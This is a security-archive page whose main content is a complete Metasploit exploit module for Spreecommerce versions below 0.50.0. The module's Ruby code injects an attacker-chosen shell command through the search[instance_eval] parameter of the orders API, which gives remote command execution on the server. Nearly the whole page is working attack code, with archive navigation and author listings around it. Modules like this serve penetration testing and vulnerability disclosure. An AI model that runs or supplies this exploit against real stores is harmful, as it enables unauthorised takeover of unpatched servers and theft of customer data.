Spreecommerce Arbitrary Command Execution

Spreecommerce Arbitrary Command Execution: Posted Apr 22, 2011; Authored by joernchen | Site metasploit.com; This Metasploit module exploits an arbitrary command execution vulnerability in the Spreecommerce API searchlogic. Unvalidated input is called via the Ruby send method allowing command execution.; tags | exploit, arbitrary, ruby; advisories | OSVDB-71900; SHA-256 | 5f324564c756ec1163ada3b1c576328ce33a96570f58fa83e43acb3bf9d56e4e; Download | Favorite | View

Spreecommerce Arbitrary Command Execution

##
# $Id: spree_searchlogic_exec.rb 12397 2011-04-21 19:38:42Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Spreecommerce < 0.50.0 Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits an arbitrary command execution vulnerability in the
          Spreecommerce API searchlogic. Unvalidated input is called via the 
          Ruby send method allowing command execution.
      },
      'Author'         => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 12397 $',
      'References'     =>
        [
          [ 'OSVDB', '71900'],
          [ 'URL', 'http://www.spreecommerce.com/blog/2011/04/19/security-fixes/' ],

        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 31337,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Apr 19 2011',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('URI', [true, "The path to the Spreecommerce main site", "/"]),
        ], self.class)
  end

  def exploit
    command = Rex::Text.uri_encode(payload.encoded)
    urlconfigdir = datastore['URI'] + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
    res = send_request_raw({
      'uri'     => urlconfigdir,
      'method'  => 'GET',
      'headers' =>
      {
        'HTTP_AUTHORIZATION' => 'ABCD', #needs to be present
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Connection' => 'Close',
      }
    }, 0.4 ) #short timeout, we don't care about the response
    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
    end
    handler
  end

end

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 85 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Debian 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

Spreecommerce Arbitrary Command Execution

Spreecommerce Arbitrary Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Spreecommerce Arbitrary Command Execution

Share This

Spreecommerce Arbitrary Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems